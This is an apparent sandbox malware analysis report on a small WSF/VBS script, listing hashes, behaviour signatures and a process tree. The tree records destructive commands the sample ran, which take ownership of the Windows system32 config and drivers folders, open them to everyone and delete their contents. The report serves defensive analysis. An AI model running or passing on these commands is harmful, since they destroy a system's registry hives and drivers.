Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-08-2024 21:37

General

  • Target

    target.wsf

  • Size

    2KB

  • MD5

    6425a144c5de5bc3bcd5865809150a0d

  • SHA1

    257d00e71e71832c90fc494b5121df3a8149560d

  • SHA256

    7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad

  • SHA512

    95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3216
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3292
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3820
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3152
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:5112
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:4072
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3476
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2940
    • C:\Windows\System32\Notepad.exe
      "C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\target.wsf
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:2912
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf"
      1⤵
        PID:4560
      • C:\Windows\System32\Notepad.exe
        "C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\thescript.vbs
        1⤵
        • Opens file in notepad (likely ransom note)
        PID:2328
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ConfirmResize.vbs"
        1⤵
          PID:4300

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\target.wsf

          Filesize

          144B

          MD5

          7efc82c24c2ce07d6e37f750cc9aa312

          SHA1

          24641d0653f3b3b850b25319bdae26bf1a46040a

          SHA256

          78d136408cfd4790b861a67f1a7acb826c7c7e8ee75aa7fa5b60ae6e33216d4f

          SHA512

          a1a3ee6fa3bfede92806362447b787a29b3ad1e9f64322eec4c8ef38e7a3742eef843373da1461512bc7ee83953344ff67fff2c46eb57fc2feca9e632847edde

        • C:\Users\Admin\AppData\Local\Temp\thescript.vbs

          Filesize

          2KB

          MD5

          6425a144c5de5bc3bcd5865809150a0d

          SHA1

          257d00e71e71832c90fc494b5121df3a8149560d

          SHA256

          7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad

          SHA512

          95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34

        • C:\Users\Admin\Desktop\desktop.vbs

          Filesize

          78B

          MD5

          ece02545122cc48c9d8afaf3f94dd04f

          SHA1

          8e07b6da685faad07f8413230a95ce0ae8987e0d

          SHA256

          5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206

          SHA512

          e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5

        • C:\Users\Admin\Music\SuspendProtect.mp3

          Filesize

          2B

          MD5

          81051bcc2cf1bedf378224b0a93e2877

          SHA1

          ba8ab5a0280b953aa97435ff8946cbcbb2755a27

          SHA256

          7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

          SHA512

          1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d